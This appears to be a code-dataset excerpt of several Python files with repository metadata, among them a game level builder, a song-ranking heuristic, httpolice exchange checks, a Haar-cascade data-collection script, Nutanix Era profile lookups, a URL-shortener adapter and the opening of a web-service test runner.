| 1,657 | 10 | 126 |
25203173320d6e81dd19ebeb6706912118a5fe19 | 1,278 | py | Python | utils/scripts/OOOlevelGen/src/levels/Watch_Out.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | utils/scripts/OOOlevelGen/src/levels/Watch_Out.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | utils/scripts/OOOlevelGen/src/levels/Watch_Out.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | import LevelBuilder
from sprites import * | 91.285714 | 149 | 0.726917 | import LevelBuilder
from sprites import *
def render(name,bg):
    """Build the 'Watch_Out' level and write it out as <name>.plist.

    :param name: base name of the output plist file
    :param bg: background identifier passed to the LevelBuilder
    NOTE(review): object order is preserved as authored — presumably the
    builder serializes objects in insertion order; confirm before reordering.
    """
    lb = LevelBuilder.LevelBuilder(name+".plist",background=bg)
    # Static beams forming the platforms/ramps (density/friction per sprite).
    lb.addObject(Beam.BeamSprite(x=147, y=261,width=306,height=14,angle='-4',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
    # Dynamic enemies resting on the platforms.
    lb.addObject(Enemy.EnemySprite(x=23, y=297,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
    lb.addObject(Beam.BeamSprite(x=238, y=165,width=201,height=14,angle='56',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
    lb.addObject(Beam.BeamSprite(x=285, y=125,width=342,height=14,angle='56',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
    lb.addObject(Beam.BeamSprite(x=451, y=260,width=154,height=14,angle='-4',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
    lb.addObject(Enemy.EnemySprite(x=315, y=227,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
    lb.addObject(Enemy.EnemySprite(x=273, y=278,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
    # Goal star and player start position.
    lb.addObject(Star.StarSprite(x=447, y=291,width=32,height=32))
    lb.addObject(Hero.HeroSprite(x=23, y=24,width=32,height=32))
    lb.render()
647b67367c0e63e28881482b5c1f510ab1372ef4 | 6,264 | py | Python | core/predictor.py | huynhnhathao/hum_to_find | a0d7ec4bab1a7e2f7175956ff2721e23e2448840 | [
"MIT"
] | 1 | 2021-12-22T07:30:18.000Z | 2021-12-22T07:30:18.000Z | core/predictor.py | huynhnhathao/hum_to_find | a0d7ec4bab1a7e2f7175956ff2721e23e2448840 | [
"MIT"
] | null | null | null | core/predictor.py | huynhnhathao/hum_to_find | a0d7ec4bab1a7e2f7175956ff2721e23e2448840 | [
"MIT"
] | 1 | 2022-01-28T02:36:17.000Z | 2022-01-28T02:36:17.000Z | from typing import Dict, List
import pickle
import numpy as np
def predict_song(neighbors: Dict[str, List[int]]) -> Dict[str, List[int]]:
    """Rank candidate song ids for each hummed query from its retrieved neighbors.

    :param neighbors: maps query name -> list of song ids ordered by
        ascending retrieval distance (nearest first); ids are assumed ints.
    :return: maps query name -> list of exactly 10 song ids, best first
        (padded with 0 when fewer than 10 distinct candidates exist).

    Heuristics applied per query, in order (first match wins):
        1. a song appearing >= 3 times in the top 5 is ranked first;
        2. two songs each appearing twice in the top 5: the nearest of them
           first, the other second;
        3. one song appearing twice in the top 5: it is ranked first
           (followed by the nearest neighbor when that differs);
        4. 10 distinct songs in the top 10: keep the distance order;
        5. 5 distinct songs in the top 5: songs repeated in positions 6-10
           are promoted ahead of the rest.
    Remaining slots are filled by distance order, skipping duplicates.
    """
    # first we only choose the first rank song
    # assume song_ids are all ints
    ranked_ = {}
    for qname, nbs in neighbors.items():
        chosen = []
        # if one song appear more than 3 times in top 5, it must be the one
        # if the nearest song is not ranked first by this rule, it must be ranked second
        ids, counts = np.unique(nbs[:5], return_counts = True)
        max_count = np.max(counts)
        if max_count >=3:
            idx = list(counts).index(max_count)
            chosen.append(ids[idx])
            if nbs[0] != chosen[0]:
                chosen.append(nbs[0])
            ranked_[qname] = chosen
            continue
        # if in top 5 there are *2* song_ids that both appear 2 times, then the one
        # that on top 1 and appear 2 times will be the first, the one on top 2
        # or larger and appear 2 times will be the second
        ids, counts = np.unique(nbs[:5], return_counts = True)
        max_count = np.max(counts)
        if len(ids) == 3 and max_count == 2:
            nearest_song = nbs[0]
            idx_of_nearest_song = list(ids).index(nearest_song)
            count_of_nearest_song = counts[idx_of_nearest_song]
            if count_of_nearest_song == 2:
                chosen.append(nearest_song)
            for i, c in enumerate(counts):
                if c == 2 and ids[i] not in chosen:
                    chosen.append(ids[i])
            ranked_[qname] = chosen
            continue
        # if in top 5, there is *one* song_id that appear 2 times and one of that is
        # top 1, then it must be the one
        # if that song_id appear 2 times but not the nearest, then it still ranked
        # top 1 but the second ranked is the nearest
        ids, counts = np.unique(nbs[:5], return_counts = True)
        if len(ids) == 4:
            nearest_song_id = nbs[0]
            idx_of_nearest_song = list(ids).index(nearest_song_id)
            if counts[idx_of_nearest_song] == 2:
                chosen.append(nearest_song_id)
                ranked_[qname] = chosen
                continue
            elif counts[idx_of_nearest_song] == 1:
                idx = list(counts).index(2)
                song_id = ids[idx]
                chosen.append(song_id)
                chosen.append(nearest_song_id)
        # NOTE(review): the elif branch above falls through without storing
        # `chosen` in ranked_; none of the later branches can fire for a
        # 4-distinct-ids top 5, so this query ends up handled by the
        # `absences` loop and the two picks are discarded -- TODO confirm
        # whether a `ranked_[qname] = chosen; continue` is missing here.
        # if top 10 are 10 different songs, the just take those
        ids, counts = np.unique(nbs[:10], return_counts = True)
        if len(ids) == 10:
            chosen = nbs[:10]
            ranked_[qname] = list(chosen)
            continue
        # if in top 5, there are 5 different song ids, and there is one or more
        # song_ids that also appear on top 10 and on top 5, then it will be the
        # first rank, the second rank is the one that nearest(if the previous is
        # not the nearest)
        ids, counts = np.unique(nbs[:5], return_counts = True)
        if len(ids) == 5: # also means max_count == 1
            new_ids, new_counts = np.unique(nbs[5:10], return_counts = True)
            for id in nbs[:5]:
                if int(id) in new_ids:
                    chosen.append(id)
            if len(chosen) == 0:
                chosen = list(nbs[:10])
                ranked_[qname] = chosen
                continue
            if chosen[0] != nbs[0]:
                chosen.append(nbs[0])
            ranked_[qname] = chosen
            continue
        if len(chosen) == 0:
            ranked_[qname] = list(nbs[:10])
    # now add the remaining neighbors to the rank list, follow the distance rank
    for qname, ranks in ranked_.items():
        if len(ranks) == 0:
            print('ranks=0')
        j = 0
        while len(ranks) < 10 and j < len(neighbors[qname]):
            if neighbors[qname][j] not in ranks:
                ranks.append(neighbors[qname][j])
            j+=1
        # pad with 0 so every query yields exactly 10 entries
        while len(ranks) < 10:
            ranks.append(0)
    # queries that fell through every heuristic: plain distance order, deduped
    absences = set(neighbors.keys()) - set(ranked_.keys())
    for qname in absences:
        chosen = []
        j = 0
        while len(chosen) < 10 and j < len(neighbors[qname]):
            if neighbors[qname][j] not in chosen:
                chosen.append(neighbors[qname][j])
            j +=1
        while len(chosen) < 10:
            chosen.append(0)
        ranked_[qname] = chosen
    return ranked_
if __name__ == '__main__':
    # Load precomputed nearest-neighbour lists and the validation tuples.
    neighbors = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\neighbors.pkl', 'rb'))
    val_data = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\crepe_freq\val_data.pkl', 'rb'))
    print(len(neighbors))
    # Neighbour ids may be numpy/str values; normalize to plain ints.
    for qname, nbs in neighbors.items():
        neighbors[qname] = [int(x) for x in neighbors[qname]]
    rs = predict_song(neighbors)
    print(len(rs))
    # Mean Reciprocal Rank over the validation set.
    # Assumes val_data tuples are (song_id, ..., query_name) -- TODO confirm.
    mrr = []
    for key in rs.keys():
        for tup in val_data:
            if key == tup[2]:
                if int(tup[0]) not in list(rs[key]):
                    mrr.append(0)
                else:
                    idx = list(rs[key]).index(int(tup[0])) +1
                    mrr.append(1/idx)
    print(np.mean(mrr))
import pickle
import numpy as np
def predict_song(neighbors: Dict[str, List[int]]) -> Dict[str, List[int]]:
"""predict the ranks of song ids for each hum given its retrieved song neighbors
The most importance job is choose the first place song
The rules are, given one hum query and its retrieved neighbors:
1. if in top 10, there is no song id that appear 2 times then the rank
follow the distance rank
2. if in top 10, there is a song that appear >= 3 times, it must be ranked first place
3. if in top 10, there are song ids that appear 2 times and their ranks < 5, it will be ranked first
4. if in top 10, there are more than one song id that appear >= 2 times,
choose the one that has rank sum smaller to be top 1, then the second rank is the next
the other positions will follow the distance rank given that it is not already in the ranked list.
"""
# first we only choose the first rank song
# assume song_ids are all ints
ranked_ = {}
for qname, nbs in neighbors.items():
chosen = []
# if one song appear more than 3 times in top 5, it must be the one
# if the nearest song is not ranked first by this rule, it must be ranked second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if max_count >=3:
idx = list(counts).index(max_count)
chosen.append(ids[idx])
if nbs[0] != chosen[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
# if in top 5 there are *2* song_ids that both appear 2 times, then the one
# that on top 1 and appear 2 times will be the first, the one on top 2
# or larger and appear 2 times will be the second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if len(ids) == 3 and max_count == 2:
nearest_song = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song)
count_of_nearest_song = counts[idx_of_nearest_song]
if count_of_nearest_song == 2:
chosen.append(nearest_song)
for i, c in enumerate(counts):
if c == 2 and ids[i] not in chosen:
chosen.append(ids[i])
ranked_[qname] = chosen
continue
# if in top 5, there is *one* song_id that appear 2 times and one of that is
# top 1, then it must be the one
# if that song_id appear 2 times but not the nearest, then it still ranked
# top 1 but the second ranked is the nearest
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 4:
nearest_song_id = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song_id)
if counts[idx_of_nearest_song] == 2:
chosen.append(nearest_song_id)
ranked_[qname] = chosen
continue
elif counts[idx_of_nearest_song] == 1:
idx = list(counts).index(2)
song_id = ids[idx]
chosen.append(song_id)
chosen.append(nearest_song_id)
# if top 10 are 10 different songs, the just take those
ids, counts = np.unique(nbs[:10], return_counts = True)
if len(ids) == 10:
chosen = nbs[:10]
ranked_[qname] = list(chosen)
continue
# if in top 5, there are 5 different song ids, and there is one or more
# song_ids that also appear on top 10 and on top 5, then it will be the
# first rank, the second rank is the one that nearest(if the previous is
# not the nearest)
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 5: # also means max_count == 1
new_ids, new_counts = np.unique(nbs[5:10], return_counts = True)
for id in nbs[:5]:
if int(id) in new_ids:
chosen.append(id)
if len(chosen) == 0:
chosen = list(nbs[:10])
ranked_[qname] = chosen
continue
if chosen[0] != nbs[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
if len(chosen) == 0:
ranked_[qname] = list(nbs[:10])
# now add the remaining neighbors to the rank list, follow the distance rank
for qname, ranks in ranked_.items():
if len(ranks) == 0:
print('ranks=0')
j = 0
while len(ranks) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in ranks:
ranks.append(neighbors[qname][j])
j+=1
while len(ranks) < 10:
ranks.append(0)
absences = set(neighbors.keys()) - set(ranked_.keys())
for qname in absences:
chosen = []
j = 0
while len(chosen) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in chosen:
chosen.append(neighbors[qname][j])
j +=1
while len(chosen) < 10:
chosen.append(0)
ranked_[qname] = chosen
return ranked_
if __name__ == '__main__':
neighbors = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\neighbors.pkl', 'rb'))
val_data = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\crepe_freq\val_data.pkl', 'rb'))
print(len(neighbors))
for qname, nbs in neighbors.items():
neighbors[qname] = [int(x) for x in neighbors[qname]]
rs = predict_song(neighbors)
print(len(rs))
mrr = []
for key in rs.keys():
for tup in val_data:
if key == tup[2]:
if int(tup[0]) not in list(rs[key]):
mrr.append(0)
else:
idx = list(rs[key]).index(int(tup[0])) +1
mrr.append(1/idx)
print(np.mean(mrr)) | 0 | 0 | 0 |
06eed4751ad15e78692e64926dfd2741664949ce | 583 | py | Python | utils/model_utils.py | jayleicn/moment_detr | a5d0fa0f0b9ab005cf277327da0cb81ac1455194 | [
"MIT"
] | 90 | 2021-07-20T19:44:36.000Z | 2022-03-30T06:53:07.000Z | utils/model_utils.py | synchrony10/moment_detr | e93f63ff64d702a446a59350e0cd7bdcc417361c | [
"MIT"
] | 12 | 2021-08-03T03:14:00.000Z | 2022-03-24T13:03:27.000Z | utils/model_utils.py | synchrony10/moment_detr | e93f63ff64d702a446a59350e0cd7bdcc417361c | [
"MIT"
] | 15 | 2021-07-21T06:13:58.000Z | 2022-03-13T02:10:27.000Z | def count_parameters(model, verbose=True):
"""Count number of parameters in PyTorch model,
References: https://discuss.pytorch.org/t/how-do-i-check-the-number-of-parameters-of-a-model/4325/7.
from utils.utils import count_parameters
count_parameters(model)
import sys
sys.exit(1)
"""
n_all = sum(p.numel() for p in model.parameters())
n_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
if verbose:
print("Parameter Count: all {:,d}; trainable {:,d}".format(n_all, n_trainable))
return n_all, n_trainable
| 36.4375 | 104 | 0.689537 | def count_parameters(model, verbose=True):
"""Count number of parameters in PyTorch model,
References: https://discuss.pytorch.org/t/how-do-i-check-the-number-of-parameters-of-a-model/4325/7.
from utils.utils import count_parameters
count_parameters(model)
import sys
sys.exit(1)
"""
n_all = sum(p.numel() for p in model.parameters())
n_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
if verbose:
print("Parameter Count: all {:,d}; trainable {:,d}".format(n_all, n_trainable))
return n_all, n_trainable
| 0 | 0 | 0 |
923c97b76b64e523bffcff87a6d47e5eb6f80a73 | 2,247 | py | Python | httpolice/exchange.py | bmwiedemann/httpolice | 4da2bde3d14a24b0623ee45ae10afd192d6fa771 | [
"MIT"
] | 1 | 2019-04-10T12:46:13.000Z | 2019-04-10T12:46:13.000Z | httpolice/exchange.py | bmwiedemann/httpolice | 4da2bde3d14a24b0623ee45ae10afd192d6fa771 | [
"MIT"
] | null | null | null | httpolice/exchange.py | bmwiedemann/httpolice | 4da2bde3d14a24b0623ee45ae10afd192d6fa771 | [
"MIT"
] | null | null | null | # -*- coding: utf-8; -*-
from httpolice import request, response
from httpolice.blackboard import Blackboard
from httpolice.known import st
def complaint_box(*args, **kwargs):
    """Create an empty exchange that only carries a single notice.

    This is used (for example, in :mod:`httpolice.framing1`)
    to report notices that do not correspond to any particular message.

    All positional and keyword arguments are forwarded to
    :meth:`Blackboard.complain`; returns the resulting :class:`Exchange`.
    """
    # An exchange with no request and no responses acts as a bare notice carrier.
    box = Exchange(None, [])
    box.complain(*args, **kwargs)
    return box
def check_exchange(exch):
    """Run all checks on the exchange `exch`, modifying it in place."""
    # Track whether the client asked for a "100 Continue" interim response.
    expect_100 = False
    if exch.request:
        request.check_request(exch.request)
        expect_100 = exch.request.headers.expect == u'100-continue'
    response.check_responses(exch.responses)
    for resp in exch.responses:
        # A 100 (Continue) satisfies the expectation.
        if resp.status == st.continue_:
            expect_100 = False
        # Notice 1305: 101 (Switching Protocols) sent while a
        # "100-continue" expectation is still outstanding.
        if expect_100 and resp.status == st.switching_protocols:
            resp.complain(1305)
| 30.364865 | 77 | 0.621273 | # -*- coding: utf-8; -*-
from httpolice import request, response
from httpolice.blackboard import Blackboard
from httpolice.known import st
class Exchange(Blackboard):
    """One HTTP exchange: a request plus the responses it elicited."""
    # Note that an exchange is a :class:`Blackboard`,
    # so notices can be reported directly on it.
    # See :func:`complaint_box`.
    self_name = u'exch'
    def __repr__(self):
        return 'Exchange(%r, %r)' % (self.request, self.responses)
    def __init__(self, req, resps):
        """
        :param req:
            The request, as a :class:`~httpolice.Request` object.
            If it is not available, you can pass `None`,
            and the responses will be checked on their own.
            However, this **disables many checks**
            which rely on context information from the request.
        :param resps:
            The responses to `req`,
            as a list of :class:`~httpolice.Response` objects.
            Usually this will be a list of 1 element.
            If you only want to check the request, pass an empty list ``[]``.
        """
        super(Exchange, self).__init__()
        # Link every response back to its request so response-side checks
        # can consult request context.
        for resp in resps:
            resp.request = req
        self.request = req
        self.responses = resps
    @property
    def children(self):
        """The request (if any) and responses, after the base class's children."""
        r = super(Exchange, self).children
        if self.request is not None:
            r.append(self.request)
        r.extend(self.responses)
        return r
def complaint_box(*args, **kwargs):
"""Create an empty exchange that only carries a single notice.
This is used (for example, in :mod:`httpolice.framing1`)
to report notices that do not correspond to any particular message.
"""
box = Exchange(None, [])
box.complain(*args, **kwargs)
return box
def check_exchange(exch):
"""Run all checks on the exchange `exch`, modifying it in place."""
expect_100 = False
if exch.request:
request.check_request(exch.request)
expect_100 = exch.request.headers.expect == u'100-continue'
response.check_responses(exch.responses)
for resp in exch.responses:
if resp.status == st.continue_:
expect_100 = False
if expect_100 and resp.status == st.switching_protocols:
resp.complain(1305)
| 228 | 1,025 | 23 |
331c20c552c40b6bdb2cf47c04c503e2ded9cf8f | 2,024 | py | Python | python/haarClassifiers/trainHaarCascade.py | NunoDuarte/openCVdevelop | 43204a903a3c96758332a86c7d6b10c285d6ed37 | [
"MIT"
] | null | null | null | python/haarClassifiers/trainHaarCascade.py | NunoDuarte/openCVdevelop | 43204a903a3c96758332a86c7d6b10c285d6ed37 | [
"MIT"
] | null | null | null | python/haarClassifiers/trainHaarCascade.py | NunoDuarte/openCVdevelop | 43204a903a3c96758332a86c7d6b10c285d6ed37 | [
"MIT"
] | null | null | null | import urllib
import cv2
import numpy as np
import os
create_pos_n_neg() | 33.180328 | 99 | 0.528656 | import urllib
import cv2
import numpy as np
import os
def store_raw_images():
    """Download ImageNet synset images into ``neg/`` as 100x100 grayscale JPEGs.

    Uses the Python 2 ``urllib`` API (``urlopen``/``urlretrieve``).
    Each URL in the synset listing is fetched, converted to grayscale,
    resized to 100x100 and saved as ``neg/<n>.jpg``.  Per-image failures
    (dead links, unreadable files) are printed and skipped.
    """
    neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n07942152'
    #neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n00523513'
    neg_images_urls = urllib.urlopen(neg_images_link).read().decode()
    if not os.path.exists('neg'):
        os.makedirs('neg')
    # Starting index 919 -- presumably continues a previously downloaded
    # batch without overwriting it; TODO confirm.
    pic_num = 919
    for i in neg_images_urls.split('\n'):
        try:
            print(i)
            urllib.urlretrieve(i, "neg/" + str(pic_num)+'.jpg')
            img = cv2.imread("neg/" + str(pic_num)+'.jpg', cv2.IMREAD_GRAYSCALE)
            resize_image = cv2.resize(img, (100, 100))
            cv2.imwrite("neg/" + str(pic_num)+'.jpg', resize_image)
            pic_num += 1
        except Exception as e:
            # Best-effort download: report the failure and move on.
            print(str(e))
def find_uglies():
    """Delete downloaded images that are pixel-identical to known-bad ones.

    Compares every image under ``neg/`` against every reference image in
    ``uglies/`` (ImageNet placeholder/error images) and removes exact
    matches.  Read errors are printed and skipped.
    """
    for file_type in ['neg']:
        for img in os.listdir(file_type):
            for ugly in os.listdir('uglies'):
                try:
                    current_image_path = str(file_type)+'/'+str(img)
                    ugly = cv2.imread('uglies/'+str(ugly))
                    question = cv2.imread(current_image_path)
                    # Exact match: identical shape and zero XOR difference.
                    if ugly.shape == question.shape and not (np.bitwise_xor(ugly, question).any()):
                        print('You ugly!')
                        print(current_image_path)
                        os.remove(current_image_path)
                except Exception as e:
                    print(str(e))
def create_pos_n_neg():
    """Write the OpenCV cascade-training description files.

    Appends one line per image under each listed directory:
    ``bg.txt`` gets plain paths for negatives; ``info.dat`` gets
    ``path count x y w h`` annotation lines for positives.
    """
    for file_type in ['neg']:
        for img in os.listdir(file_type):
            if file_type == 'neg':
                line = file_type + '/' + img + '\n'
                with open('bg.txt', 'a') as f:
                    f.write(line)
            # we are not using this!
            elif file_type == 'pos':
                # BUG FIX: the annotation must be separated from the path.
                # The original concatenated the path and "1 0 0 50 50" with
                # no space, producing info.dat entries opencv_createsamples
                # cannot parse.
                line = file_type + '/' + img + ' 1 0 0 50 50\n'
                with open('info.dat', 'a') as f:
                    f.write(line)
create_pos_n_neg() | 1,881 | 0 | 69 |
40d75528c0577bc7d64f4d85d7514f0c5d3b052f | 1,819 | py | Python | play/EraPostgresProvision/scripts/Substrate_Era_PostgreSQL_DB_Action___pre_create___Task__2GetProfileIDs.py | halsayed/calm | 46c93ac2b02227663f0184d149f62d142b2638cc | [
"MIT"
] | null | null | null | play/EraPostgresProvision/scripts/Substrate_Era_PostgreSQL_DB_Action___pre_create___Task__2GetProfileIDs.py | halsayed/calm | 46c93ac2b02227663f0184d149f62d142b2638cc | [
"MIT"
] | null | null | null | play/EraPostgresProvision/scripts/Substrate_Era_PostgreSQL_DB_Action___pre_create___Task__2GetProfileIDs.py | halsayed/calm | 46c93ac2b02227663f0184d149f62d142b2638cc | [
"MIT"
] | 1 | 2021-11-16T10:28:42.000Z | 2021-11-16T10:28:42.000Z | # Set creds and headers
era_user = '@@{era_creds.username}@@'
era_pass = '@@{era_creds.secret}@@'
headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
# Get Software Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Software&name=@@{software_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "SOFTWARE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Software Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Compute Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Compute&name=@@{compute_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "COMPUTE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Compute Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Network Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Network&name=@@{network_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "NETWORK_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Network Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get DB Parameter ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Database_Parameter&name=@@{database_parameter}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "DB_PARAM_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get DB Parameter ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1) | 45.475 | 109 | 0.706432 | # Set creds and headers
era_user = '@@{era_creds.username}@@'
era_pass = '@@{era_creds.secret}@@'
headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
# Get Software Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Software&name=@@{software_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "SOFTWARE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Software Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Compute Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Compute&name=@@{compute_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "COMPUTE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Compute Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Network Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Network&name=@@{network_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "NETWORK_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Network Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get DB Parameter ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Database_Parameter&name=@@{database_parameter}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "DB_PARAM_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get DB Parameter ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1) | 0 | 0 | 0 |
effc868ba3985263b54f27c9ba1dafa032b3a960 | 351 | py | Python | services/shortto.py | joshthecoder/shorty-python | 35687d010683944d75e3f0dce7799903296172c5 | [
"MIT"
] | 11 | 2015-05-29T04:58:28.000Z | 2020-05-31T17:07:52.000Z | services/shortto.py | joshthecoder/shorty-python | 35687d010683944d75e3f0dce7799903296172c5 | [
"MIT"
] | null | null | null | services/shortto.py | joshthecoder/shorty-python | 35687d010683944d75e3f0dce7799903296172c5 | [
"MIT"
] | 2 | 2015-03-10T06:22:31.000Z | 2018-06-18T18:20:59.000Z | ## Shorty
## Copyright 2009 Joshua Roesslein
## See LICENSE
## @url short.to
| 21.9375 | 65 | 0.60114 | ## Shorty
## Copyright 2009 Joshua Roesslein
## See LICENSE
## @url short.to
class Shortto(Service):
    """Adapter for the short.to URL-shortening service."""
    def shrink(self, bigurl):
        # short.to returns the shortened URL as the bare response body.
        resp = request('http://short.to/s.txt', {'url': bigurl})
        return resp.read()
    def expand(self, tinyurl):
        # long.to resolves a short URL back to the original long URL.
        resp = request('http://long.to/do.txt', {'url': tinyurl})
        return resp.read()
| 194 | 2 | 76 |
d545d30c9fd67772bfbdc34fdd46ac0419574c8a | 19,748 | py | Python | ws/test_web_services.py | OpenTreeOfLife/otcetera | 2b5ff724094f768df9bc37b9f0ffb319abd03a20 | [
"BSD-2-Clause",
"MIT"
] | 4 | 2015-04-29T09:23:12.000Z | 2020-11-30T07:43:07.000Z | ws/test_web_services.py | OpenTreeOfLife/otcetera | 2b5ff724094f768df9bc37b9f0ffb319abd03a20 | [
"BSD-2-Clause",
"MIT"
] | 70 | 2015-03-19T08:19:40.000Z | 2022-03-21T19:06:18.000Z | ws/test_web_services.py | OpenTreeOfLife/otcetera | 2b5ff724094f768df9bc37b9f0ffb319abd03a20 | [
"BSD-2-Clause",
"MIT"
] | 3 | 2015-07-03T19:21:20.000Z | 2015-12-02T13:24:53.000Z | #!/usr/bin/env python
import subprocess
import requests
import json
import time
import logging
try:
from Queue import Queue
except:
from queue import Queue
from threading import Thread, RLock
_LOG = logging.getLogger(__name__)
_LOG.setLevel(logging.DEBUG)
_lh = logging.StreamHandler()
_lh.setFormatter(logging.Formatter("[%(asctime)s] %(filename)s (%(lineno)3d): %(levelname) 8s: %(message)s"))
_LOG.addHandler(_lh)
NUM_TESTS = 0
FAILED_TESTS = []
FRAC_FLOAT_DIFF_TOL = 0.001
#########################################################################################
# The following code for execution in a non-blocking thread is from pyraphyletic. If
# we moved it to peyotl, we could import it from there (at the cost of making)
# otcetera depend on peyot.
class JobQueue(Queue):
    """Thread-safe Queue that logs the addition of a job to debug"""
    def put(self, item, block=True, timeout=None):
        """Logs `item` at the debug level then calls base-class put.

        BUG FIX: the default was ``block=None``, which the base class
        treats as falsy, silently turning the default ``put`` into a
        non-blocking one (raising ``Full`` on a bounded queue instead of
        waiting).  ``block=True`` restores ``Queue.put``'s documented
        default behaviour; explicit callers are unaffected.
        """
        _LOG.debug("%s queued" % str(item))
        Queue.put(self, item, block=block, timeout=timeout)
_jobq = JobQueue()
def worker():
    """Infinite loop of getting jobs off of _jobq and performing them."""
    while True:
        job = _jobq.get()
        _LOG.debug('"{}" started"'.format(job))
        try:
            job.start()
        except:
            # Deliberately broad: a worker thread must never die from a
            # job's exception; log with traceback and keep serving the queue.
            _LOG.exception("Worker dying.")
        else:
            try:
                job.get_results()
            except:
                _LOG.exception("Worker exception. Error in job.get_results")
        _LOG.debug('"{}" completed'.format(job))
        # Mark the job done so Queue.join() callers can unblock.
        _jobq.task_done()
_WORKER_THREADS = []
def start_worker(num_workers):
    """Spawns worker threads such that at least `num_workers` threads will be
    launched for processing jobs in the jobq.

    The only way that you can get more than `num_workers` threads is if you
    have previously called the function with a number > `num_workers`.
    (worker threads are never killed).
    """
    assert num_workers > 0, "A positive number must be passed as the number of worker threads"
    num_currently_running = len(_WORKER_THREADS)
    for i in range(num_currently_running, num_workers):
        _LOG.debug("Launching Worker thread #%d" % i)
        t = Thread(target=worker)
        _WORKER_THREADS.append(t)
        # Thread.setDaemon() is deprecated (removed in Python 3.12+);
        # assigning the attribute works on both Python 2 and 3.
        t.daemon = True
        t.start()
#########################################################################################
_verb_name_to_req_method = {"GET": requests.get,
"PUT": requests.put,
"POST": requests.post,
"DELETE": requests.delete,
"HEAD": requests.head,
"OPTIONS": requests.options,
}
API_HEADERS = {'content-type' : 'application/json',
'accept' : 'application/json',
}
#########################################################################################
PIDFILE_NAME = "pidfile.txt"
RUNNING_SERVER = None
SERVER_PORT = 1985 # global, set by CLI. Needed by server launch and threads
SERVER_OUT_ERR_FN = "test-server-stdouterr.txt"
FAILED_TESTS, ERRORED_TESTS = [], []
if __name__ == '__main__':
import argparse
import codecs
import sys
import os
parser = argparse.ArgumentParser(description="Runs the otc-tol-ws and tests described in method.json files")
parser.add_argument('--taxonomy-dir', required=True, help='Directory that is the parent of the taxonomy files')
